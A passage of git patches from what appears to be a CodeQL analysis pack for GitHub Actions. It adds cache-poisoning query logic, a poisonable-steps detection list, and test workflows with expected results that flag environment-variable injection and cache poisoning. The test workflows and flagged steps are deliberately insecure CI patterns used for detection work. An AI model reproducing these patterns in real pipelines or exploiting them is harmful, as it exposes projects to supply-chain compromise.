"$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -80,3 +83,4 @@ subpaths | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 2cd36953802..eaa9fed4c61 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,5 +59,7 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select From 0990774302bc2556973584bb4c4d41043f0d7b78 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 18:53:53 +0200 Subject: [PATCH 0449/1267] feat(poisonable_steps): Add python -m pip install --- ql/lib/ext/config/poisonable_steps.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index e2742fd60a7..f79ca795cd0 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -44,6 +44,8 @@ extensions: - ["poetry"] - ["pylint"] - ["pytest"] + - ["python\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"] - ["rake"] - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] From 397eb2a762ae15ff89237c7b8db0f8443ef9fdb1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:20 +0200 Subject: [PATCH 0450/1267] Add getPath() to PRHeadCheckout and CacheWriting classes Add getPath() methods to get the path where a checkout step writes the code and where a Cache write reads the files from. --- .../actions/security/CachePoisoningQuery.qll | 34 ++++++++++++++++++- .../security/UntrustedCheckoutQuery.qll | 30 +++++++++++++++- 2 files changed, 62 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 29c0ed4feed..8c1a9ee0fd7 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -44,14 +44,28 @@ predicate runsOnDefaultBranch(Event e) { ) } -abstract class CacheWritingStep extends Step { } +abstract class CacheWritingStep extends Step { + abstract string getPath(); +} class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class SetupJavaUsesStep extends CacheWritingStep, UsesStep { @@ -62,6 +76,9 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupGoUsesStep extends CacheWritingStep, UsesStep { @@ -73,6 +90,9 @@ class SetupGoUsesStep extends CacheWritingStep, UsesStep { this.getArgument("cache") = "true" ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupNodeUsesStep extends CacheWritingStep, UsesStep { @@ -83,6 +103,9 @@ class SetupNodeUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupPythonUsesStep extends CacheWritingStep, UsesStep { @@ -93,6 +116,9 @@ class SetupPythonUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { @@ -103,6 +129,9 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -110,4 +139,7 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and this.getArgument("bundler-cache") = "true" } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fba33bb8bc8..7cfda4da49c 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,6 +1,12 @@ import actions import codeql.actions.DataFlow +string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -68,7 +74,9 @@ predicate containsHeadRef(string s) { } /** Checkout of a Pull Request HEAD */ -abstract class PRHeadCheckoutStep extends Step { } +abstract class PRHeadCheckoutStep extends Step { + abstract string getPath(); +} /** Checkout of a Pull Request HEAD ref */ abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } @@ -138,6 +146,12 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using actions/checkout action */ @@ -194,6 +208,12 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -216,6 +236,8 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -235,6 +257,8 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -256,6 +280,8 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -274,4 +300,6 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } From c5314aeb6c1e7497733f539c783ce5d7ec083bc9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:27 +0200 Subject: [PATCH 0451/1267] Add new tests --- .../CWE-349/.github/workflows/test22.yml | 35 +++++++++++++++++++ .../CWE-349/.github/workflows/test23.yml | 35 +++++++++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml new file mode 100644 index 00000000000..f8e1dabf565 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml @@ -0,0 +1,35 @@ +name: Test + +on: + issue_comment: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- + - name: Download artifact + uses: actions/download-artifact@v4 + with: + name: results + path: results/ + - name: Upload results + uses: actions/upload-artifact@v4 + with: + name: results + path: results/ + if-no-files-found: ignore diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml new file mode 100644 index 00000000000..3f35068eb7d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml @@ -0,0 +1,35 @@ +name: Test + +on: + issue_comment: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ./results/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- + - name: Download artifact + uses: actions/download-artifact@v4 + with: + name: results + path: results/ + - name: Upload results + uses: actions/upload-artifact@v4 + with: + name: results + path: results/ + if-no-files-found: ignore From 34b48d559b17536e9274f0bcf9e462ab5a8aeb57 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:45:51 +0200 Subject: [PATCH 0452/1267] Add expected tests results --- .../Security/CWE-349/CachePoisoning.expected | 52 +++++++++++-------- 1 file changed, 30 insertions(+), 22 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 994beb3b74f..2ad477a2a8b 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -64,26 +64,34 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | +| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | +| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | +| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | +| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | +| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | +| .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | From 2273aadb4bc0b80bc48eec448de0b6405a5e32ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:47:00 +0200 Subject: [PATCH 0453/1267] Improve Cache Poisoning query The untrusted files path is compared with the path written to the cache to check if the cache can really be poisoned --- ql/src/Security/CWE-349/CachePoisoning.ql | 52 ++++++++++++++++++++--- 1 file changed, 45 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 6609dae2b7f..3f2bb8db472 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,19 +18,47 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[cache_path, untrusted_path] +predicate controlledCachePath(string cache_path, string untrusted_path) { + exists(string normalized_cache_path, string normalized_untrusted_path | + ( + cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") + or + normalized_cache_path 